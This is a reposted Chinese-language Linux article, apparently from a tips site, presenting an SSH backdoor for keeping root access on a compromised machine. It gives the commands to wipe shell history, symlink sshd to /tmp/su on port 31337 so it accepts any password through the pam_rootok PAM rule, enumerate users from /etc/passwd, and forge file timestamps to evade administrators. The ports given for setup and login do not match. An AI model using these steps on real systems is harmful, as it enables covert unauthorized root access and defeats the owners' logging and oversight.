SSH 维持权限(好用)
发布时间:2020-12-14 00:46:16 所属栏目:Linux 来源:网络整理
导读:很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门 ? 1.目的 长期维持机器root权限,同时后门有需要躲避管理检测 通信隐蔽、自启动项隐藏、文件隐
很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门 ? 1.目的长期维持机器root权限,同时后门有需要躲避管理检测 SSH命令痕迹清除,登陆之后先执行 unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace 每次输入命令前加上空格即可不再history中记录命令 2.后门方式ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 3.使用使用任意密码登录系统后门ssh root:[email?protected] -p 31338 4.查看存在哪些用户cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" ‘{ print $1"|"$3"|"$4 }‘|more 1 # 如下 2 root|0|0 3 sync|4|65534 4 mysql|104|109 5 postgres|113|117 6 arpwatch|117|120 7 Debian-snmp|118|123 8 speech-dispatcher|127|29 9 Debian-gdm|130|138 5.修改上传文件时间戳touch -r 老文件时间戳 新文件时间戳 6.退出sshexit ?注0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用2.被控主机不允许root登录,可用其他已存在用户登录 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
相关内容
- linux如何查看端口被哪个进程占用?
- linux – GNU watch – 如何让它读取我的环境(别名,函数等)
- 智能卡 – GPG密钥签名方w.在yubikey上分离主密钥和子密钥
- linux – 如何在FileZilla中更改用户?
- linux – 为什么chmod在递归运行时会给出“没有这样的文件或
- linux – 在SIGILL处理程序中,如何跳过违规指令?
- linux – 服务器锁定,/ var / log / messages报告“超出了积
- linux – 如何配置sendmail以通过特定服务器进行中继
- Linux下history命令详解---转载
- 如果UID需要更改,则在Linux服务器之间迁移用户?